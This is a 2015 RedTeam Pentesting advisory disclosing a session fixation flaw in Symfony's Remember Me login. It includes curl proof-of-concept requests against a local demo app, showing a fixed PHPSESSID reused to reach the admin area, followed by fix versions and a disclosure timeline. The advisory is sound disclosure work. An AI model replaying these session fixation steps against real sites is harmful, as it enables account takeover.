[RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality Dec 22 2015 01:38PM
RedTeam Pentesting GmbH (release redteam-pentesting de)
Advisory: Symfony PHP Framework: Session Fixation In "Remember Me" Login

A session fixation vulnerability within the Symfony web application
framework's "Remember Me" login functionality allows an attacker to
impersonate the victim towards the web application if the session ID
value was previously known to the attacker.


Product: Symfony
Affected Versions: 2.3.0 to 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6
Fixed Versions: 2.3.35, 2.6.12, and 2.7.7 [2]
Vulnerability Type: Session Fixation
Security Risk: low
Vendor URL: https://symfony.com/
Vendor Status: fixed version released [2]
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-013
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"Symfony is a set of PHP Components, a Web Application framework, a
Philosophy, and a Community â?? all working together in harmony."

(from Symfony's homepage)

More Details

The following details are explained using the official Symfony Demo
application[0]. The "Remember Me" login functionality was activated
according to [1]. The security configuration file was modified as

-- app/config/security.yml ---------------------------------------------

key: "IdOpAkToufatt8knawt{"
lifetime: 604800
path: /
always_remember_me: true


If the following URL is requested, the Symfony application redirects to
a login screen where a username and password must be supplied:

$ curl -I 'http://localhost:8000/en/admin/post/'
HTTP/1.1 302 Found
Host: localhost:8000
Set-Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3; path=/
Location: http://localhost:8000/en/login

On submission, an HTTP POST request is performed by the browser:

POST /en/login_check HTTP/1.1
Host: localhost:8000
Referer: http://localhost:8000/en/login
Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3


If the supplied credentials are correct, the Symfony application
responds as follows:

HTTP/1.1 302 Found
Host: localhost:8000
Set-Cookie: PHPSESSID=vk2e3enjr0uafgonr0i3u2b4t5; path=/
2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk; expires=Thu,
29-Oct-2015 12:27:14 GMT; Max-Age=604800;
Location: http://localhost:8000/en/admin/post/

The cookie PHPSESSID is set to a new value and a new cookie named
REMEMBERME is set in the client. The PHPSESSID is a session cookie
only and has a limited lifetime. In contrast, the REMEMBERME cookie has
a validity of one week. It allows users to stay logged in for longer
than the regular session lasts.

The REMEMBERME cookie's value consists of four data fields separated by
colons and is encoded in base64. The first data field references the
application's user object, followed by the base64-encoded username. The
third data field is a timestamp of the cookie's expiration date. The
last one is a MAC value to protect the other three against manipulation.

$ base64 -d <<< QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkx

$ base64 -d <<< YW5uYV9hZG1pbg==

$ date -d @1446121634
Thu Oct 29 13:27:14 CET 2015

Proof of Concept

If the following URL is requested with an unauthorised session ID, the
Symfony application redirects to the login page (as already shown

$ curl -I 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam'
HTTP/1.1 302 Found
Host: localhost:8000
Location: http://localhost:8000/en/login

In the case that a valid REMEMBERME cookie is included in the HTTP
request, the user is successfully authenticated:

$ curl -s -i 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam; REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZ''VjloWkcxcGJnPT06MTQ0NjE
HTTP/1.1 200 OK
Host: localhost:8000

<!DOCTYPE html>
<td>In hac habitasse platea dictumst</td>
<td>anna_admin (at) symfony (dot) com [email concealed]</td>
<td>8/23/15, 10:16 AM</td>

After this HTTP request, the PHPSESSID value suffices to authenticate
the user. In contrast to the regular login procedure, the web
application did not assign a new value to the PHPSESSID cookie. If an
attacker somehow got in possession of the cookie's value or has
successfully set a given cookie value in the user's browser at some
point in the past, the attacker is now able to access the web
application with the user's permissions:

$ curl -s -i 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam'
HTTP/1.1 200 OK
Host: localhost:8000

<!DOCTYPE html>
<td>In hac habitasse platea dictumst</td>
<td>anna_admin (at) symfony (dot) com [email concealed]</td>
<td>8/23/15, 10:16 AM</td>


Disable the "Remember Me" login functionality within the configuration
file security.yml.


Upgrade to a fixed version if possible, otherwise refer to section

Security Risk

The described vulnerability allows an attacker to access a Symfony web
application with the attacked user's permissions. The attack requires
that the "Remember Me" login functionality is used by the application.
Additionally, the attacker either got access to the PHPSESSID cookie
value or has successfully set a new value in the user's browser. Because
of its requirements, the described vulnerability poses a low risk only.
The risk estimation may be increased to medium or high based on the
affected web application and the accessible data.


2015-09-11 Vulnerability identified
2015-09-16 Customer approved disclosure to vendor
2015-10-27 Vendor notified
2015-11-23 Fixed by vendor [2]
2015-12-22 Advisory released


[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html
[2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Version: GnuPG v2


[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus